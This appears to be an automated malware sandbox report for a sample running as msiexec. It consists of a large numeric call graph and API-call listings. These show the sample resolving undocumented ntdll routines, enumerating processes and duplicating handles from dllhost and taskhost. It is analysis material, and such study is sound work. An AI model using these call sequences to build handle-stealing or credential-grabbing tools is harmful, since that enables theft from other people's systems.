GetVersionExW 39611->39612 39613 409d0a 39611->39613 39612->39613 39613->38747 39613->38750 39614->38754 39615->38756 39616->38822 39618 40bba5 39617->39618 39665 40cc26 39618->39665 39621 40bd4b 39686 40cc0c 39621->39686 39626 40b2cc 27 API calls 39627 40bbef 39626->39627 39693 40ccf0 _wcsicmp 39627->39693 39629 40bbf5 39629->39621 39694 40ccb4 6 API calls 39629->39694 39631 40bc26 39632 40cf04 17 API calls 39631->39632 39633 40bc2e 39632->39633 39634 40bd43 39633->39634 39635 40b2cc 27 API calls 39633->39635 39636 40cc0c 4 API calls 39634->39636 39637 40bc40 39635->39637 39636->39621 39695 40ccf0 _wcsicmp 39637->39695 39639 40bc46 39639->39634 39640 40bc61 memset memset WideCharToMultiByte 39639->39640 39696 40103c strlen 39640->39696 39642 40bcc0 39643 40b273 27 API calls 39642->39643 39644 40bcd0 memcmp 39643->39644 39644->39634 39645 40bce2 39644->39645 39646 404423 37 API calls 39645->39646 39647 40bd10 39646->39647 39647->39634 39648 40bd3a LocalFree 39647->39648 39649 40bd1f memcpy 39647->39649 39648->39634 39649->39648 39650->38837 39652 409a74 GetTempFileNameW 39651->39652 39653 409a66 GetWindowsDirectoryW 39651->39653 39652->38835 39653->39652 39654->38872 39655->38872 39656->38872 39657->38872 39658->38872 39659->38872 39660->38872 39661->38872 39662->38872 39663->38847 39664->38869 39697 4096c3 CreateFileW 39665->39697 39667 40cc34 39668 40cc3d GetFileSize 39667->39668 39669 40bbca 39667->39669 39670 40afcf 2 API calls 39668->39670 39669->39621 39677 40cf04 39669->39677 39671 40cc64 39670->39671 39698 40a2ef ReadFile 39671->39698 39673 40cc71 39699 40ab4a MultiByteToWideChar 39673->39699 39675 40cc95 CloseHandle 39676 40b04b ??3@YAXPAX 39675->39676 39676->39669 39678 40b633 free 39677->39678 39679 40cf14 39678->39679 39705 40b1ab free free 39679->39705 39681 40bbdd 39681->39621 39681->39626 39682 40cf1b 39682->39681 39684 40cfef 39682->39684 39706 40cd4b 39682->39706 39685 40cd4b 14 API calls 39684->39685 39685->39681 39687 40b633 free 39686->39687 39688 40cc15 39687->39688 39689 40aa04 free 39688->39689 39690 40cc1d 39689->39690 39752 40b1ab free free 39690->39752 39692 40b7d4 memset CreateFileW 39692->38828 39692->38829 39693->39629 39694->39631 39695->39639 39696->39642 39697->39667 39698->39673 39700 40ab6b 39699->39700 39704 40ab93 39699->39704 39701 40a9ce 4 API calls 39700->39701 39702 40ab74 39701->39702 39703 40ab7c MultiByteToWideChar 39702->39703 39703->39704 39704->39675 39705->39682 39707 40cd7b 39706->39707 39740 40aa29 6 API calls 39707->39740 39709 40cef5 39710 40aa04 free 39709->39710 39711 40cefd 39710->39711 39711->39682 39712 40cd89 39712->39709 39741 40aa29 6 API calls 39712->39741 39714 40ce1d 39742 40aa29 6 API calls 39714->39742 39716 40ce3e 39717 40ce6a 39716->39717 39743 40abb7 wcslen memmove 39716->39743 39718 40ce9f 39717->39718 39746 40abb7 wcslen memmove 39717->39746 39749 40a8d0 7 API calls 39718->39749 39722 40ce56 39744 40aa71 wcslen 39722->39744 39723 40ce8b 39747 40aa71 wcslen 39723->39747 39724 40ceb5 39750 40a8d0 7 API calls 39724->39750 39727 40ce5e 39745 40abb7 wcslen memmove 39727->39745 39728 40ce93 39748 40abb7 wcslen memmove 39728->39748 39732 40cecb 39751 40d00b malloc memcpy free free 39732->39751 39734 40cedd 39735 40aa04 free 39734->39735 39736 40cee5 39735->39736 39737 40aa04 free 39736->39737 39738 40ceed 39737->39738 39739 40aa04 free 39738->39739 39739->39709 39740->39712 39741->39714 39742->39716 39743->39722 39744->39727 39745->39717 39746->39723 39747->39728 39748->39718 39749->39724 39750->39732 39751->39734 39752->39692 39753->38887 39754->38895 37675 44dea5 37676 44deb5 FreeLibrary 37675->37676 37677 44dec3 37675->37677 37676->37677 39764 4148b6 FindResourceW 39765 4148cf SizeofResource 39764->39765 39768 4148f9 39764->39768 39766 4148e0 LoadResource 39765->39766 39765->39768 39767 4148ee LockResource 39766->39767 39766->39768 39767->39768 37851 415304 free 39769 441b3f 39779 43a9f6 39769->39779 39771 441b61 39952 4386af memset 39771->39952 39773 44189a 39774 4418e2 39773->39774 39776 442bd4 39773->39776 39775 4418ea 39774->39775 39953 4414a9 12 API calls 39774->39953 39776->39775 39954 441409 memset 39776->39954 39780 43aa20 39779->39780 39781 43aadf 39779->39781 39780->39781 39782 43aa34 memset 39780->39782 39781->39771 39783 43aa56 39782->39783 39784 43aa4d 39782->39784 39955 43a6e7 39783->39955 39963 42c02e memset 39784->39963 39789 43aad3 39965 4169a7 11 API calls 39789->39965 39790 43aaae 39790->39781 39790->39789 39805 43aae5 39790->39805 39791 43ac18 39794 43ac47 39791->39794 39967 42bbd5 memcpy memcpy memcpy memset memcpy 39791->39967 39795 43aca8 39794->39795 39968 438eed 16 API calls 39794->39968 39798 43acd5 39795->39798 39970 4233ae 11 API calls 39795->39970 39971 423426 11 API calls 39798->39971 39799 43ac87 39969 4233c5 16 API calls 39799->39969 39803 43ace1 39972 439811 162 API calls 39803->39972 39804 43a9f6 160 API calls 39804->39805 39805->39781 39805->39791 39805->39804 39966 439bbb 22 API calls 39805->39966 39807 43acfd 39812 43ad2c 39807->39812 39973 438eed 16 API calls 39807->39973 39809 43ad19 39974 4233c5 16 API calls 39809->39974 39810 43ad58 39975 44081d 162 API calls 39810->39975 39812->39810 39816 43add9 39812->39816 39815 43ae3a memset 39817 43ae73 39815->39817 39816->39816 39979 423426 11 API calls 39816->39979 39980 42e1c0 146 API calls 39817->39980 39818 43adab 39977 438c4e 162 API calls 39818->39977 39821 43ad6c 39821->39781 39821->39818 39976 42370b memset memcpy memset 39821->39976 39823 43adcc 39978 440f84 12 API calls 39823->39978 39824 43ae96 39981 42e1c0 146 API calls 39824->39981 39827 43aea8 39828 43aec1 39827->39828 39982 42e199 146 API calls 39827->39982 39829 43af00 39828->39829 39983 42e1c0 146 API calls 39828->39983 39829->39781 39833 43af1a 39829->39833 39834 43b3d9 39829->39834 39984 438eed 16 API calls 39833->39984 39840 43b3f6 39834->39840 39842 43b4c8 39834->39842 39836 43b60f 39836->39781 40043 4393a5 17 API calls 39836->40043 39838 43af2f 39985 4233c5 16 API calls 39838->39985 40025 432878 12 API calls 39840->40025 39841 43af51 39986 423426 11 API calls 39841->39986 39844 43b4f2 39842->39844 40031 42bbd5 memcpy memcpy memcpy memset memcpy 39842->40031 40032 43a76c 21 API calls 39844->40032 39846 43af7d 39987 423426 11 API calls 39846->39987 39850 43b529 40033 44081d 162 API calls 39850->40033 39851 43b462 40027 423330 11 API calls 39851->40027 39852 43af94 39988 423330 11 API calls 39852->39988 39856 43afca 39989 423330 11 API calls 39856->39989 39857 43b47e 39861 43b497 39857->39861 40028 42374a memcpy memset memcpy memcpy memcpy 39857->40028 39858 43b544 39862 43b55c 39858->39862 40034 42c02e memset 39858->40034 39859 43b428 39859->39851 40026 432b60 16 API calls 39859->40026 40029 4233ae 11 API calls 39861->40029 40035 43a87a 162 API calls 39862->40035 39863 43afdb 39990 4233ae 11 API calls 39863->39990 39869 43b56c 39872 43b58a 39869->39872 40036 423330 11 API calls 39869->40036 39870 43b4b1 40030 423399 11 API calls 39870->40030 39871 43afee 39991 44081d 162 API calls 39871->39991 40037 440f84 12 API calls 39872->40037 39874 43b4c1 40039 42db80 162 API calls 39874->40039 39879 43b592 40038 43a82f 16 API calls 39879->40038 39882 43b5b4 40040 438c4e 162 API calls 39882->40040 39884 43b5cf 40041 42c02e memset 39884->40041 39886 43b005 39886->39781 39890 43b01f 39886->39890 39992 42d836 162 API calls 39886->39992 39887 43b1ef 40002 4233c5 16 API calls 39887->40002 39890->39887 40000 423330 11 API calls 39890->40000 40001 42d71d 162 API calls 39890->40001 39891 43b212 40003 423330 11 API calls 39891->40003 39892 43b087 39993 4233ae 11 API calls 39892->39993 39893 43add4 39893->39836 40042 438f86 16 API calls 39893->40042 39897 43b22a 40004 42ccb5 11 API calls 39897->40004 39900 43b23f 40005 4233ae 11 API calls 39900->40005 39901 43b10f 39996 423330 11 API calls 39901->39996 39903 43b257 40006 4233ae 11 API calls 39903->40006 39907 43b129 39997 4233ae 11 API calls 39907->39997 39908 43b26e 40007 4233ae 11 API calls 39908->40007 39911 43b09a 39911->39901 39994 42cc15 19 API calls 39911->39994 39995 4233ae 11 API calls 39911->39995 39912 43b282 40008 43a87a 162 API calls 39912->40008 39914 43b13c 39998 440f84 12 API calls 39914->39998 39916 43b29d 40009 423330 11 API calls 39916->40009 39919 43b15f 39999 4233ae 11 API calls 39919->39999 39920 43b2af 39922 43b2b8 39920->39922 39923 43b2ce 39920->39923 40010 4233ae 11 API calls 39922->40010 40011 440f84 12 API calls 39923->40011 39926 43b2c9 40013 4233ae 11 API calls 39926->40013 39927 43b2da 40012 42370b memset memcpy memset 39927->40012 39930 43b2f9 40014 423330 11 API calls 39930->40014 39932 43b30b 40015 423330 11 API calls 39932->40015 39934 43b325 40016 423399 11 API calls 39934->40016 39936 43b332 40017 4233ae 11 API calls 39936->40017 39938 43b354 40018 423399 11 API calls 39938->40018 39940 43b364 40019 43a82f 16 API calls 39940->40019 39942 43b370 40020 42db80 162 API calls 39942->40020 39944 43b380 40021 438c4e 162 API calls 39944->40021 39946 43b39e 40022 423399 11 API calls 39946->40022 39948 43b3ae 40023 43a76c 21 API calls 39948->40023 39950 43b3c3 40024 423399 11 API calls 39950->40024 39952->39773 39953->39775 39954->39776 39956 43a6f5 39955->39956 39957 43a765 39955->39957 39956->39957 40044 42a115 39956->40044 39957->39781 39964 4397fd memset 39957->39964 39961 43a73d 39961->39957 39962 42a115 146 API calls 39961->39962 39962->39957 39963->39783 39964->39790 39965->39781 39966->39805 39967->39794 39968->39799 39969->39795 39970->39798 39971->39803 39972->39807 39973->39809 39974->39812 39975->39821 39976->39818 39977->39823 39978->39893 39979->39815 39980->39824 39981->39827 39982->39828 39983->39828 39984->39838 39985->39841 39986->39846 39987->39852 39988->39856 39989->39863 39990->39871 39991->39886 39992->39892 39993->39911 39994->39911 39995->39911 39996->39907 39997->39914 39998->39919 39999->39890 40000->39890 40001->39890 40002->39891 40003->39897 40004->39900 40005->39903 40006->39908 40007->39912 40008->39916 40009->39920 40010->39926 40011->39927 40012->39926 40013->39930 40014->39932 40015->39934 40016->39936 40017->39938 40018->39940 40019->39942 40020->39944 40021->39946 40022->39948 40023->39950 40024->39893 40025->39859 40026->39851 40027->39857 40028->39861 40029->39870 40030->39874 40031->39844 40032->39850 40033->39858 40034->39862 40035->39869 40036->39872 40037->39879 40038->39874 40039->39882 40040->39884 40041->39893 40042->39836 40043->39781 40045 42a175 40044->40045 40047 42a122 40044->40047 40045->39957 40050 42b13b 146 API calls 40045->40050 40047->40045 40048 42a115 146 API calls 40047->40048 40051 43a174 40047->40051 40075 42a0a8 146 API calls 40047->40075 40048->40047 40050->39961 40065 43a196 40051->40065 40066 43a19e 40051->40066 40052 43a306 40052->40065 40095 4388c4 14 API calls 40052->40095 40055 42a115 146 API calls 40055->40066 40057 43a642 40057->40065 40099 4169a7 11 API calls 40057->40099 40061 43a635 40098 42c02e memset 40061->40098 40065->40047 40066->40052 40066->40055 40066->40065 40076 42ff8c 40066->40076 40084 415a91 40066->40084 40088 4165ff 40066->40088 40091 439504 13 API calls 40066->40091 40092 4312d0 146 API calls 40066->40092 40093 42be4c memcpy memcpy memcpy memset memcpy 40066->40093 40094 43a121 11 API calls 40066->40094 40068 42bf4c 14 API calls 40070 43a325 40068->40070 40069 4169a7 11 API calls 40069->40070 40070->40057 40070->40061 40070->40065 40070->40068 40070->40069 40071 42b5b5 memset memcpy 40070->40071 40074 4165ff 11 API calls 40070->40074 40096 42b63e 14 API calls 40070->40096 40097 42bfcf memcpy 40070->40097 40071->40070 40074->40070 40075->40047 40100 43817e 40076->40100 40078 42ff9d 40078->40066 40079 42ff99 40079->40078 40080 42ffe3 40079->40080 40081 42ffd0 40079->40081 40105 4169a7 11 API calls 40080->40105 40104 4169a7 11 API calls 40081->40104 40085 415a9d 40084->40085 40086 415ab3 40085->40086 40087 415aa4 memset 40085->40087 40086->40066 40087->40086 40256 4165a0 40088->40256 40091->40066 40092->40066 40093->40066 40094->40066 40095->40070 40096->40070 40097->40070 40098->40057 40099->40065 40101 438187 40100->40101 40103 438192 40100->40103 40106 4380f6 40101->40106 40103->40079 40104->40078 40105->40078 40108 43811f 40106->40108 40107 438164 40107->40103 40108->40107 40111 437e5e 40108->40111 40134 4300e8 memset memset memcpy 40108->40134 40135 437d3c 40111->40135 40113 437eb3 40113->40108 40114 437ea9 40114->40113 40120 437f22 40114->40120 40150 41f432 40114->40150 40117 437f06 40197 415c56 11 API calls 40117->40197 40118 437f7f 40121 437f95 40118->40121 40124 43802b 40118->40124 40120->40118 40122 432d4e 3 API calls 40120->40122 40198 415c56 11 API calls 40121->40198 40122->40118 40125 4165ff 11 API calls 40124->40125 40126 438054 40125->40126 40161 437371 40126->40161 40129 43806b 40130 438094 40129->40130 40199 42f50e 137 API calls 40129->40199 40132 437fa3 40130->40132 40200 4300e8 memset memset memcpy 40130->40200 40132->40113 40201 41f638 103 API calls 40132->40201 40134->40108 40136 437d69 40135->40136 40139 437d80 40135->40139 40202 437ccb 11 API calls 40136->40202 40138 437d76 40138->40114 40139->40138 40140 437da3 40139->40140 40141 437d90 40139->40141 40143 438460 133 API calls 40140->40143 40141->40138 40206 437ccb 11 API calls 40141->40206 40146 437dcb 40143->40146 40144 437de8 40205 424f26 122 API calls 40144->40205 40146->40144 40203 444283 13 API calls 40146->40203 40148 437dfc 40204 437ccb 11 API calls 40148->40204 40151 41f54d 40150->40151 40157 41f44f 40150->40157 40152 41f466 40151->40152 40236 41c635 memset memset 40151->40236 40152->40117 40152->40120 40157->40152 40159 41f50b 40157->40159 40207 41f1a5 40157->40207 40232 41c06f memcmp 40157->40232 40233 41f3b1 89 API calls 40157->40233 40234 41f398 85 API calls 40157->40234 40159->40151 40159->40152 40235 41c295 85 API calls 40159->40235 40237 41703f 40161->40237 40163 437399 40164 43739d 40163->40164 40166 4373ac 40163->40166 40244 4446ea 11 API calls 40164->40244 40167 416935 16 API calls 40166->40167 40168 4373ca 40167->40168 40170 438460 133 API calls 40168->40170 40174 4251c4 136 API calls 40168->40174 40178 415a91 memset 40168->40178 40181 43758f 40168->40181 40193 437584 40168->40193 40196 437d3c 134 API calls 40168->40196 40245 425433 13 API calls 40168->40245 40246 425413 17 API calls 40168->40246 40247 42533e 16 API calls 40168->40247 40248 42538f 16 API calls 40168->40248 40249 42453e 122 API calls 40168->40249 40169 4375bc 40252 415c7d 16 API calls 40169->40252 40170->40168 40173 4375d2 40195 4373a7 40173->40195 40253 4442e6 11 API calls 40173->40253 40174->40168 40176 4375e2 40176->40195 40254 444283 13 API calls 40176->40254 40178->40168 40250 42453e 122 API calls 40181->40250 40182 4375f4 40187 437620 40182->40187 40188 43760b 40182->40188 40186 43759f 40189 416935 16 API calls 40186->40189 40191 416935 16 API calls 40187->40191 40255 444283 13 API calls 40188->40255 40189->40193 40191->40195 40193->40169 40251 42453e 122 API calls 40193->40251 40194 437612 memcpy 40194->40195 40195->40129 40196->40168 40197->40113 40198->40132 40199->40130 40200->40132 40201->40113 40202->40138 40203->40148 40204->40144 40205->40138 40206->40138 40208 41bc3b 100 API calls 40207->40208 40209 41f1b4 40208->40209 40210 41edad 85 API calls 40209->40210 40217 41f282 40209->40217 40211 41f1cb 40210->40211 40212 41f1f5 memcmp 40211->40212 40213 41f20e 40211->40213 40211->40217 40212->40213 40214 41f21b memcmp 40213->40214 40213->40217 40215 41f326 40214->40215 40218 41f23d 40214->40218 40216 41ee6b 85 API calls 40215->40216 40215->40217 40216->40217 40217->40157 40218->40215 40219 41f28e memcmp 40218->40219 40221 41c8df 55 API calls 40218->40221 40219->40215 40220 41f2a9 40219->40220 40220->40215 40223 41f308 40220->40223 40224 41f2d8 40220->40224 40222 41f269 40221->40222 40222->40215 40225 41f287 40222->40225 40226 41f27a 40222->40226 40223->40215 40230 4446ce 11 API calls 40223->40230 40227 41ee6b 85 API calls 40224->40227 40225->40219 40228 41ee6b 85 API calls 40226->40228 40229 41f2e0 40227->40229 40228->40217 40231 41b1ca memset 40229->40231 40230->40215 40231->40217 40232->40157 40233->40157 40234->40157 40235->40151 40236->40152 40238 417044 40237->40238 40239 41705c 40237->40239 40241 416760 11 API calls 40238->40241 40243 417055 40238->40243 40240 417075 40239->40240 40242 41707a 11 API calls 40239->40242 40240->40163 40241->40243 40242->40238 40243->40163 40244->40195 40245->40168 40246->40168 40247->40168 40248->40168 40249->40168 40250->40186 40251->40169 40252->40173 40253->40176 40254->40182 40255->40194 40261 415cfe 40256->40261 40265 415d23 __aullrem __aulldvrm 40261->40265 40268 41628e 40261->40268 40262 4163ca 40275 416422 11 API calls 40262->40275 40264 416172 memset 40264->40265 40265->40262 40265->40264 40266 416422 10 API calls 40265->40266 40267 415cb9 10 API calls 40265->40267 40265->40268 40266->40265 40267->40265 40269 416520 40268->40269 40270 416527 40269->40270 40274 416574 40269->40274 40272 416544 40270->40272 40270->40274 40276 4156aa 11 API calls 40270->40276 40273 416561 memcpy 40272->40273 40272->40274 40273->40274 40274->40066 40275->40268 40276->40272 40298 41493c EnumResourceNamesW 37679 4287c1 37680 4287d2 37679->37680 37681 429ac1 37679->37681 37682 428818 37680->37682 37683 42881f 37680->37683 37703 425711 37680->37703 37693 425ad6 37681->37693 37749 415c56 11 API calls 37681->37749 37716 42013a 37682->37716 37744 420244 96 API calls 37683->37744 37687 4260dd 37743 424251 119 API calls 37687->37743 37689 4259da 37742 416760 11 API calls 37689->37742 37694 429a4d 37699 429a66 37694->37699 37700 429a9b 37694->37700 37697 422aeb memset memcpy memcpy 37697->37703 37745 415c56 11 API calls 37699->37745 37702 429a96 37700->37702 37747 416760 11 API calls 37700->37747 37748 424251 119 API calls 37702->37748 37703->37681 37703->37689 37703->37694 37703->37697 37704 4260a1 37703->37704 37712 4259c2 37703->37712 37715 425a38 37703->37715 37732 4227f0 memset memcpy 37703->37732 37733 422b84 15 API calls 37703->37733 37734 422b5d memset memcpy memcpy 37703->37734 37735 422640 13 API calls 37703->37735 37737 4241fc 11 API calls 37703->37737 37738 42413a 89 API calls 37703->37738 37741 415c56 11 API calls 37704->37741 37705 429a7a 37746 416760 11 API calls 37705->37746 37712->37693 37736 415c56 11 API calls 37712->37736 37715->37712 37739 422640 13 API calls 37715->37739 37740 4226e0 12 API calls 37715->37740 37717 42014c 37716->37717 37720 420151 37716->37720 37759 41e466 96 API calls 37717->37759 37719 420162 37719->37703 37720->37719 37721 4201b3 37720->37721 37722 420229 37720->37722 37723 4201b8 37721->37723 37724 4201dc 37721->37724 37722->37719 37725 41fd5e 85 API calls 37722->37725 37750 41fbdb 37723->37750 37724->37719 37729 4201ff 37724->37729 37756 41fc4c 37724->37756 37725->37719 37729->37719 37731 42013a 96 API calls 37729->37731 37731->37719 37732->37703 37733->37703 37734->37703 37735->37703 37736->37689 37737->37703 37738->37703 37739->37715 37740->37715 37741->37689 37742->37687 37743->37693 37744->37703 37745->37705 37746->37702 37747->37702 37748->37681 37749->37689 37751 41fbf8 37750->37751 37754 41fbf1 37750->37754 37764 41ee26 37751->37764 37755 41fc39 37754->37755 37774 4446ce 11 API calls 37754->37774 37755->37719 37760 41fd5e 37755->37760 37757 41ee6b 85 API calls 37756->37757 37758 41fc5d 37757->37758 37758->37724 37759->37720 37762 41fd65 37760->37762 37761 41fdab 37761->37719 37762->37761 37763 41fbdb 85 API calls 37762->37763 37763->37762 37765 41ee41 37764->37765 37766 41ee32 37764->37766 37775 41edad 37765->37775 37778 4446ce 11 API calls 37766->37778 37769 41ee3c 37769->37754 37772 41ee58 37772->37769 37780 41ee6b 37772->37780 37774->37755 37784 41be52 37775->37784 37778->37769 37779 41eb85 11 API calls 37779->37772 37781 41ee70 37780->37781 37782 41ee78 37780->37782 37837 41bf99 85 API calls 37781->37837 37782->37769 37785 41be6f 37784->37785 37786 41be5f 37784->37786 37792 41be8c 37785->37792 37816 418c63 memset memset 37785->37816 37815 4446ce 11 API calls 37786->37815 37788 41be69 37788->37769 37788->37779 37790 41bee7 37790->37788 37820 41a453 85 API calls 37790->37820 37792->37788 37792->37790 37793 41bf3a 37792->37793 37794 41bed1 37792->37794 37819 4446ce 11 API calls 37793->37819 37796 41bef0 37794->37796 37799 41bee2 37794->37799 37796->37790 37797 41bf01 37796->37797 37798 41bf24 memset 37797->37798 37800 41bf14 37797->37800 37817 418a6d memset memcpy memset 37797->37817 37798->37788 37805 41ac13 37799->37805 37818 41a223 memset memcpy memset 37800->37818 37804 41bf20 37804->37798 37806 41ac52 37805->37806 37807 41ac3f memset 37805->37807 37810 41ac6a 37806->37810 37821 41dc14 19 API calls 37806->37821 37808 41acd9 37807->37808 37808->37790 37812 41aca1 37810->37812 37822 41519d 37810->37822 37812->37808 37813 41acc0 memset 37812->37813 37814 41accd memcpy 37812->37814 37813->37808 37814->37808 37815->37788 37816->37792 37817->37800 37818->37804 37819->37790 37821->37810 37825 4175ed 37822->37825 37833 417570 SetFilePointer 37825->37833 37828 41760a ReadFile 37830 417637 37828->37830 37831 417627 GetLastError 37828->37831 37829 4151b3 37829->37812 37830->37829 37832 41763e memset 37830->37832 37831->37829 37832->37829 37834 4175b2 37833->37834 37835 41759c GetLastError 37833->37835 37834->37828 37834->37829 37835->37834 37836 4175a8 GetLastError 37835->37836 37836->37834 37837->37782 37838 417bc5 37840 417c61 37838->37840 37844 417bda 37838->37844 37839 417bf6 UnmapViewOfFile CloseHandle 37839->37839 37839->37844 37842 417c2c 37842->37844 37850 41851e 18 API calls 37842->37850 37844->37839 37844->37840 37844->37842 37845 4175b7 37844->37845 37846 4175d6 CloseHandle 37845->37846 37847 4175c8 37846->37847 37848 4175df 37846->37848 37847->37848 37849 4175ce Sleep 37847->37849 37848->37844 37849->37846 37850->37842 39755 4147f3 39758 414561 39755->39758 39757 414813 39759 41456d 39758->39759 39760 41457f GetPrivateProfileIntW 39758->39760 39763 4143f1 memset _itow WritePrivateProfileStringW 39759->39763 39760->39757 39762 41457a 39762->39757 39763->39762

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 356 40de5d-40de63 354->356 357 40de74-40de78 356->357 358 40de65-40de6c 356->358 357->352 357->356 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 372 40dff8-40dffb 370->372 373 40defd-40df02 370->373 371->370 374 40ded0-40dee1 _wcsicmp 371->374 372->363 377 40dffd-40e006 372->377 375 40df08 373->375 376 40dfef-40dff2 CloseHandle 373->376 374->370 374->377 378 40df0b-40df10 375->378 376->372 377->362 377->363 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->376 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->376
                      APIs
                      • memset.MSVCRT ref: 0040DDAD
                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                      • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                        • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                      • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                      • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                      • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                      • _wcsicmp.MSVCRT ref: 0040DEB2
                      • _wcsicmp.MSVCRT ref: 0040DEC5
                      • _wcsicmp.MSVCRT ref: 0040DED8
                      • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                      • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                      • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                      • memset.MSVCRT ref: 0040DF5F
                      • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                      • _wcsicmp.MSVCRT ref: 0040DFB2
                      • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                      • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                      • API String ID: 708747863-3398334509
                      • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                      • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                      • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                      • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 636 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 639 413f00-413f11 Process32NextW 636->639 640 413da5-413ded OpenProcess 639->640 641 413f17-413f24 CloseHandle 639->641 642 413eb0-413eb5 640->642 643 413df3-413e26 memset call 413f27 640->643 642->639 644 413eb7-413ebd 642->644 651 413e79-413e9d call 413959 call 413ca4 643->651 652 413e28-413e35 643->652 646 413ec8-413eda call 4099f4 644->646 647 413ebf-413ec6 free 644->647 649 413edb-413ee2 646->649 647->649 655 413ee4 649->655 656 413ee7-413efe 649->656 663 413ea2-413eae CloseHandle 651->663 653 413e61-413e68 652->653 654 413e37-413e44 GetModuleHandleW 652->654 653->651 660 413e6a-413e76 653->660 654->653 659 413e46-413e5c GetProcAddress 654->659 655->656 656->639 659->653 660->651 663->642
                      APIs
                        • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                      • memset.MSVCRT ref: 00413D7F
                      • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                      • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                      • memset.MSVCRT ref: 00413E07
                      • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                      • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                      • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                      • free.MSVCRT ref: 00413EC1
                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                      • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                      • String ID: QueryFullProcessImageNameW$kernel32.dll
                      • API String ID: 1344430650-1740548384
                      • Opcode ID: 0a5514244f8da3553e93fddd8650c41e468bd34edf4168a604947191dfb6c3d8
